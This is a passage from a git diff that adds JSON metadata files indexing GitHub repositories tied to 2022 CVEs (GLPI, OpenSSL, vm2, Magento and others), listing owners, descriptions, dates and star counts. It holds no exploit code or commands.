"antoinenguyen-09", + "id": 61876488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61876488?v=4", + "html_url": "https:\/\/github.com\/antoinenguyen-09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antoinenguyen-09\/CVE-2022-35649", + "description": "Payload Generator and Detailed Analysis about CVE-2022-35649 ", + "fork": false, + "created_at": "2023-03-06T10:09:59Z", + "updated_at": "2023-03-20T10:23:25Z", + "pushed_at": "2023-03-07T09:48:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35698.json b/2022/CVE-2022-35698.json new file mode 100644 index 0000000000..2cf5dd0a2c --- /dev/null +++ b/2022/CVE-2022-35698.json @@ -0,0 +1,38 @@ +[ + { + "id": 551262719, + "name": "Magento-APSB22-48-Security-Patches", + "full_name": "EmicoEcommerce\/Magento-APSB22-48-Security-Patches", + "owner": { + "login": "EmicoEcommerce", + "id": 26820069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26820069?v=4", + "html_url": "https:\/\/github.com\/EmicoEcommerce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmicoEcommerce\/Magento-APSB22-48-Security-Patches", + "description": "This repository contains potential security patches for the Magento APSB22-48 and CVE-2022-35698 security vulnerability", + "fork": false, + "created_at": "2022-10-14T04:58:26Z", + "updated_at": "2023-02-02T17:52:05Z", + "pushed_at": "2023-06-16T09:32:42Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apsb22-48", + "cve-2022-35698", + "hacktoberfest", + "magento2" + ], + "visibility": "public", + "forks": 11, + "watchers": 39, + "score": 0, + "subscribers_count": 13 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35737.json b/2022/CVE-2022-35737.json new file mode 100644 index 0000000000..601cb6be56 --- /dev/null +++ b/2022/CVE-2022-35737.json @@ -0,0 +1,64 @@ +[ + { + "id": 556829048, + "name": "CVE-2022-35737", + "full_name": "gmh5225\/CVE-2022-35737", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-35737", + "description": "Stranger strings: CVE-2022-35737", + "fork": false, + "created_at": "2022-10-24T15:36:44Z", + "updated_at": "2024-10-23T02:50:02Z", + "pushed_at": "2022-08-03T18:40:15Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 604796426, + "name": "codeql-cve-2022-35737", + "full_name": "rvermeulen\/codeql-cve-2022-35737", + "owner": { + "login": "rvermeulen", + "id": 636626, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/636626?v=4", + "html_url": "https:\/\/github.com\/rvermeulen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rvermeulen\/codeql-cve-2022-35737", + "description": "A CodeQL query to find CVE 2022-35737", + "fork": false, + "created_at": "2023-02-21T20:07:45Z", + "updated_at": "2023-03-09T10:00:52Z", + "pushed_at": "2023-02-21T20:11:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35841.json b/2022/CVE-2022-35841.json new file mode 100644 index 0000000000..f1881ccb00 --- /dev/null +++ b/2022/CVE-2022-35841.json @@ -0,0 +1,33 @@ +[ + { + "id": 536247195, + "name": "CVE-2022-35841", + "full_name": "Wack0\/CVE-2022-35841", + "owner": { + "login": "Wack0", + "id": 2650838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2650838?v=4", + "html_url": "https:\/\/github.com\/Wack0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wack0\/CVE-2022-35841", + "description": "small writeup on EnterpriseModernAppManager::ProvisionApplication bug", + "fork": false, + "created_at": "2022-09-13T17:53:56Z", + "updated_at": "2023-03-27T09:16:12Z", + "pushed_at": "2022-09-13T18:05:35Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35899.json b/2022/CVE-2022-35899.json new file mode 100644 index 0000000000..c65cd7e257 --- /dev/null +++ b/2022/CVE-2022-35899.json @@ -0,0 +1,33 @@ +[ + { + "id": 515210387, + "name": "CVE-2022-35899", + "full_name": "angelopioamirante\/CVE-2022-35899", + "owner": { + "login": "angelopioamirante", + "id": 38589929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38589929?v=4", + "html_url": "https:\/\/github.com\/angelopioamirante", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/angelopioamirante\/CVE-2022-35899", + "description": "Unquoted Service Path Asus GameSdk", + "fork": false, + "created_at": "2022-07-18T14:06:58Z", + "updated_at": "2022-07-19T05:58:13Z", + "pushed_at": "2022-07-25T13:08:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3590.json b/2022/CVE-2022-3590.json new file mode 100644 index 0000000000..0b8e13e920 --- /dev/null +++ b/2022/CVE-2022-3590.json @@ -0,0 +1,64 @@ +[ + { + "id": 652624585, + "name": "CVE-2022-3590-WordPress-Vulnerability-Scanner", + "full_name": "hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "owner": { + "login": "hxlxmjxbbxs", + "id": 96540322, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96540322?v=4", + "html_url": "https:\/\/github.com\/hxlxmjxbbxs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hxlxmjxbbxs\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "description": " This repository contains a Python script that checks WordPress websites for the CVE-2022-3590 vulnerability, which exploits an unauthenticated blind Server-Side Request Forgery (SSRF) in the WordPress pingback feature.", + "fork": false, + "created_at": "2023-06-12T13:06:54Z", + "updated_at": "2024-10-25T16:08:05Z", + "pushed_at": "2023-06-12T18:25:51Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 839637099, + "name": "CVE-2022-3590-WordPress-Vulnerability-Scanner", + "full_name": "huynhvanphuc\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "owner": { + "login": "huynhvanphuc", + "id": 2069803, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2069803?v=4", + "html_url": "https:\/\/github.com\/huynhvanphuc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/huynhvanphuc\/CVE-2022-3590-WordPress-Vulnerability-Scanner", + "description": null, + "fork": false, + "created_at": "2024-08-08T03:02:05Z", + "updated_at": "2024-08-08T03:03:59Z", + "pushed_at": "2024-08-08T03:03:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35914.json b/2022/CVE-2022-35914.json new file mode 100644 index 0000000000..e74f889e6b --- /dev/null +++ b/2022/CVE-2022-35914.json @@ -0,0 +1,250 @@ +[ + { + "id": 543696649, + "name": "CVE-2022-35914-poc", + "full_name": "cosad3s\/CVE-2022-35914-poc", + "owner": { + "login": "cosad3s", + "id": 2116674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2116674?v=4", + "html_url": "https:\/\/github.com\/cosad3s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cosad3s\/CVE-2022-35914-poc", + "description": null, + "fork": false, + "created_at": "2022-09-30T16:43:28Z", + "updated_at": "2024-09-23T04:00:19Z", + "pushed_at": "2024-01-02T11:55:38Z", + "stargazers_count": 45, + "watchers_count": 45, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 45, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 548258836, + "name": "CVE-2022-35914", + "full_name": "Lzer0Kx01\/CVE-2022-35914", + "owner": { + "login": "Lzer0Kx01", + "id": 88499633, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88499633?v=4", + "html_url": "https:\/\/github.com\/Lzer0Kx01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lzer0Kx01\/CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2022-10-09T07:46:58Z", + "updated_at": "2023-07-30T07:15:24Z", + "pushed_at": "2022-10-09T08:26:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 550214805, + "name": "CVE-2022-35914", + "full_name": "6E6L6F\/CVE-2022-35914", + "owner": { + "login": "6E6L6F", + "id": 87319528, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87319528?v=4", + "html_url": "https:\/\/github.com\/6E6L6F", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/6E6L6F\/CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2022-10-12T11:42:08Z", + "updated_at": "2023-04-26T11:50:10Z", + "pushed_at": "2022-10-12T11:42:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 562374810, + "name": "CVE-2022-35914", + "full_name": "0xGabe\/CVE-2022-35914", + "owner": { + "login": "0xGabe", + "id": 68028935, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68028935?v=4", + "html_url": "https:\/\/github.com\/0xGabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xGabe\/CVE-2022-35914", + "description": "Unauthenticated RCE in GLPI 10.0.2", + "fork": false, + "created_at": "2022-11-06T06:23:14Z", + "updated_at": "2022-11-07T01:04:45Z", + "pushed_at": "2022-11-06T06:24:00Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 610523538, + "name": "CVE-2022-35914", + "full_name": "Johnermac\/CVE-2022-35914", + "owner": { + "login": "Johnermac", + "id": 115858996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115858996?v=4", + "html_url": "https:\/\/github.com\/Johnermac", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Johnermac\/CVE-2022-35914", + "description": "Script in Ruby for the CVE-2022-35914 - RCE in GLPI ", + "fork": false, + "created_at": "2023-03-07T00:07:28Z", + "updated_at": "2023-07-18T00:58:55Z", + "pushed_at": "2023-03-07T00:20:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 791130439, + "name": "CVE-2022-35914", + "full_name": "senderend\/CVE-2022-35914", + "owner": { + "login": "senderend", + "id": 90939597, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90939597?v=4", + "html_url": "https:\/\/github.com\/senderend", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/senderend\/CVE-2022-35914", + "description": "PoC exploit for GLPI - Command injection using a third-party library script", + "fork": false, + "created_at": "2024-04-24T06:39:10Z", + "updated_at": "2024-10-23T14:37:19Z", + "pushed_at": "2024-10-17T17:56:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 847425433, + "name": "CVE-2022-35914_poc", + "full_name": "noxlumens\/CVE-2022-35914_poc", + "owner": { + "login": "noxlumens", + "id": 111706416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111706416?v=4", + "html_url": "https:\/\/github.com\/noxlumens", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noxlumens\/CVE-2022-35914_poc", + "description": "Modified for GLPI Offsec Lab: call_user_func, array_map, passthru", + "fork": false, + "created_at": "2024-08-25T19:32:59Z", + "updated_at": "2024-08-25T19:34:26Z", + "pushed_at": "2024-08-25T19:34:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 860618453, + "name": "exploit_CVE-2022-35914", + "full_name": "btar1gan\/exploit_CVE-2022-35914", + "owner": { + "login": "btar1gan", + "id": 92728059, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92728059?v=4", + "html_url": "https:\/\/github.com\/btar1gan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/btar1gan\/exploit_CVE-2022-35914", + "description": null, + "fork": false, + "created_at": "2024-09-20T19:28:27Z", + "updated_at": "2024-09-20T19:43:22Z", + "pushed_at": "2024-09-20T19:43:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-35919.json b/2022/CVE-2022-35919.json new file mode 100644 index 0000000000..58ee59bd1d --- /dev/null +++ b/2022/CVE-2022-35919.json @@ -0,0 +1,33 @@ +[ + { + "id": 742651580, + "name": "Minio-Security-Vulnerability-Checker", + "full_name": "ifulxploit\/Minio-Security-Vulnerability-Checker", + "owner": { + "login": "ifulxploit", + "id": 107668520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107668520?v=4", + "html_url": "https:\/\/github.com\/ifulxploit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ifulxploit\/Minio-Security-Vulnerability-Checker", + "description": "Program ini adalah alat (tool) yang dibuat untuk memeriksa keamanan sistem Minio terkait dengan kerentanan CVE-2022-35919", + "fork": false, + "created_at": "2024-01-13T00:49:51Z", + "updated_at": "2024-01-13T00:56:58Z", + "pushed_at": "2024-01-13T00:56:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-3602.json b/2022/CVE-2022-3602.json new file mode 100644 index 0000000000..75e9c4587a --- /dev/null +++ b/2022/CVE-2022-3602.json @@ -0,0 +1,261 @@ +[ + { + "id": 558789477, + "name": "OpenSSL-2022", + "full_name": "NCSC-NL\/OpenSSL-2022", + "owner": { + "login": "NCSC-NL", + "id": 16208471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16208471?v=4", + "html_url": "https:\/\/github.com\/NCSC-NL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NCSC-NL\/OpenSSL-2022", + "description": "Operational information regarding CVE-2022-3602 and CVE-2022-3786, two vulnerabilities in OpenSSL 3", + "fork": false, + "created_at": "2022-10-28T09:51:41Z", + "updated_at": "2024-11-13T18:00:42Z", + "pushed_at": "2022-11-18T15:47:17Z", + "stargazers_count": 529, + "watchers_count": 529, + "has_discussions": false, + "forks_count": 110, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-3602", + "cve-2022-3786", + "openssl", + "spookyssl" + ], + "visibility": "public", + "forks": 110, + "watchers": 529, + "score": 0, + "subscribers_count": 46 + }, + { + "id": 559712382, + "name": "CVE-2022-3602", + "full_name": "colmmacc\/CVE-2022-3602", + "owner": { + "login": "colmmacc", + "id": 172568, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172568?v=4", + "html_url": "https:\/\/github.com\/colmmacc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/colmmacc\/CVE-2022-3602", + "description": null, + "fork": false, + "created_at": "2022-10-30T23:32:56Z", + "updated_at": "2024-08-12T20:28:05Z", + "pushed_at": "2022-11-01T19:56:40Z", + "stargazers_count": 167, + "watchers_count": 167, + "has_discussions": false, + "forks_count": 30, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 30, + "watchers": 167, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 560108403, + "name": "CVE-2022-3602-poc", + "full_name": "eatscrayon\/CVE-2022-3602-poc", + "owner": { + "login": "eatscrayon", + "id": 99401683, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99401683?v=4", + "html_url": "https:\/\/github.com\/eatscrayon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eatscrayon\/CVE-2022-3602-poc", + "description": null, + "fork": false, + "created_at": "2022-10-31T18:52:24Z", + "updated_at": "2024-08-12T20:28:06Z", + "pushed_at": "2022-11-01T17:24:35Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560635749, + "name": "cve-2022-3602", + "full_name": "attilaszia\/cve-2022-3602", + "owner": { + "login": "attilaszia", + "id": 15521680, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15521680?v=4", + "html_url": "https:\/\/github.com\/attilaszia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/attilaszia\/cve-2022-3602", + "description": "cve-2022-3602 poc", + "fork": false, + "created_at": "2022-11-01T23:36:08Z", + "updated_at": "2024-01-18T20:23:36Z", + "pushed_at": "2022-11-01T23:41:23Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 560793497, + "name": "SpookySSL-Scanner", + "full_name": "alicangnll\/SpookySSL-Scanner", + "owner": { + "login": "alicangnll", + "id": 23417905, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23417905?v=4", + "html_url": "https:\/\/github.com\/alicangnll", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alicangnll\/SpookySSL-Scanner", + "description": "SpookySSL CVE-2022-3602 SSLv3 Scanner for Windows, Linux, macOS", + "fork": false, + "created_at": "2022-11-02T09:29:04Z", + "updated_at": "2024-08-12T20:28:08Z", + "pushed_at": "2022-11-02T14:39:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-3602", + "openssl", + "scanner", + "spookyssl", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 560986236, + "name": "cve-2022-3602-and-cve-2022-3786-openssl-poc", + "full_name": "rbowes-r7\/cve-2022-3602-and-cve-2022-3786-openssl-poc", + "owner": { + "login": "rbowes-r7", + "id": 104588115, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104588115?v=4", + "html_url": "https:\/\/github.com\/rbowes-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rbowes-r7\/cve-2022-3602-and-cve-2022-3786-openssl-poc", + "description": null, + "fork": false, + "created_at": "2022-11-02T17:33:26Z", + "updated_at": "2023-04-07T08:25:52Z", + "pushed_at": "2022-11-02T17:33:46Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 561142579, + "name": "CVE-2022-3602", + "full_name": "corelight\/CVE-2022-3602", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2022-3602", + "description": "Detects attempts at exploitation of CVE-2022-3602, a remote code execution vulnerability in OpenSSL v 3.0.0 through v.3.0.6 ", + "fork": false, + "created_at": "2022-11-03T03:19:52Z", + "updated_at": "2022-12-15T08:52:06Z", + "pushed_at": "2022-11-24T05:17:49Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 562763927, + "name": "CVE-2022-3602-and-CVE-2022-3786", + "full_name": "cybersecurityworks553\/CVE-2022-3602-and-CVE-2022-3786", + "owner": { + "login": "cybersecurityworks553", + "id": 63910792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63910792?v=4", + "html_url": "https:\/\/github.com\/cybersecurityworks553", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cybersecurityworks553\/CVE-2022-3602-and-CVE-2022-3786", + "description": null, + "fork": false, + "created_at": "2022-11-07T07:58:36Z", + "updated_at": "2024-08-14T14:52:12Z", + "pushed_at": "2022-11-09T08:21:07Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36067.json b/2022/CVE-2022-36067.json new file mode 100644 index 0000000000..e0f6acb013 --- /dev/null +++ b/2022/CVE-2022-36067.json @@ -0,0 +1,64 @@ +[ + { + "id": 550259625, + "name": "CVE-2022-36067-vm2-POC-webapp", + "full_name": "0x1nsomnia\/CVE-2022-36067-vm2-POC-webapp", + "owner": { + "login": "0x1nsomnia", + "id": 107571078, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107571078?v=4", + "html_url": "https:\/\/github.com\/0x1nsomnia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x1nsomnia\/CVE-2022-36067-vm2-POC-webapp", + "description": null, + "fork": false, + "created_at": "2022-10-12T13:09:29Z", + "updated_at": "2023-04-10T21:56:16Z", + "pushed_at": "2022-10-12T13:51:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 562153901, + "name": "Exploit-For-CVE-2022-36067", + "full_name": "Prathamrajgor\/Exploit-For-CVE-2022-36067", + "owner": { + "login": "Prathamrajgor", + "id": 78405248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78405248?v=4", + "html_url": "https:\/\/github.com\/Prathamrajgor", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Prathamrajgor\/Exploit-For-CVE-2022-36067", + "description": "This repo contains payload for the CVE-2022-36067", + "fork": false, + "created_at": "2022-11-05T13:28:27Z", + "updated_at": "2024-10-03T18:53:07Z", + "pushed_at": "2022-12-28T15:55:24Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36162.json b/2022/CVE-2022-36162.json new file mode 100644 index 0000000000..eb2fcdf718 --- /dev/null +++ b/2022/CVE-2022-36162.json @@ -0,0 +1,33 @@ +[ + { + "id": 525131569, + "name": "CVE-2022-36162", + "full_name": "MaherAzzouzi\/CVE-2022-36162", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-36162", + "description": null, + "fork": false, + "created_at": "2022-08-15T20:36:51Z", + "updated_at": "2023-03-17T11:49:32Z", + "pushed_at": "2022-08-15T20:41:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36163.json b/2022/CVE-2022-36163.json new file mode 100644 index 0000000000..33079ceb52 --- /dev/null +++ b/2022/CVE-2022-36163.json @@ -0,0 +1,33 @@ +[ + { + "id": 525133469, + "name": "CVE-2022-36163", + "full_name": "MaherAzzouzi\/CVE-2022-36163", + "owner": { + "login": "MaherAzzouzi", + "id": 62230190, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62230190?v=4", + "html_url": "https:\/\/github.com\/MaherAzzouzi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MaherAzzouzi\/CVE-2022-36163", + "description": null, + "fork": false, + "created_at": "2022-08-15T20:43:53Z", + "updated_at": "2023-12-18T15:01:23Z", + "pushed_at": "2022-08-15T20:45:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36193.json b/2022/CVE-2022-36193.json new file mode 100644 index 0000000000..287690e531 --- /dev/null +++ b/2022/CVE-2022-36193.json @@ -0,0 +1,33 @@ +[ + { + "id": 616849946, + "name": "CVE-2022-36193", + "full_name": "G37SYS73M\/CVE-2022-36193", + "owner": { + "login": "G37SYS73M", + "id": 77768845, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77768845?v=4", + "html_url": "https:\/\/github.com\/G37SYS73M", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/G37SYS73M\/CVE-2022-36193", + "description": "SQL injection in School Management System 1.0 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries.", + "fork": false, + "created_at": "2023-03-21T08:00:49Z", + "updated_at": "2023-03-21T08:00:49Z", + "pushed_at": "2023-03-21T08:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-36200.json b/2022/CVE-2022-36200.json new file mode 100644 index 0000000000..f25b533bf2 --- /dev/null +++ b/2022/CVE-2022-36200.json @@ -0,0 +1,33 @@ +[ + { + "id": 530180871, + "name": "CVE-2022-36200", + "full_name": "afaq1337\/CVE-2022-36200", + "owner": { + "login": "afaq1337", + "id": 45089292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45089292?v=4", + "html_url": "https:\/\/github.com\/afaq1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/afaq1337\/CVE-2022-36200", + "description": "CVE-2022-36200 PoC", + "fork": false, + "created_at": "2022-08-29T11:03:09Z", + "updated_at": "2024-08-12T20:26:35Z", + "pushed_at": 